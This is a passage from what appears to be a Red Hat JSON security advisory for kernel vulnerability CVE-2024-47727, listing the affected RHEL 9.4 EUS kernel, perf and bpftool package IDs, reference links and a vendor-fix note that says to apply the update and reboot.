"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-47727"
},
{
"category": "external",
"summary": "RHBZ#2320259",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2320259"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-47727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-47727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47727"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2024102105-CVE-2024-47727-1049@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2024102105-CVE-2024-47727-1049@gregkh/T"
}
],
"release_date": "2024-10-21T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-11T01:14:40+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
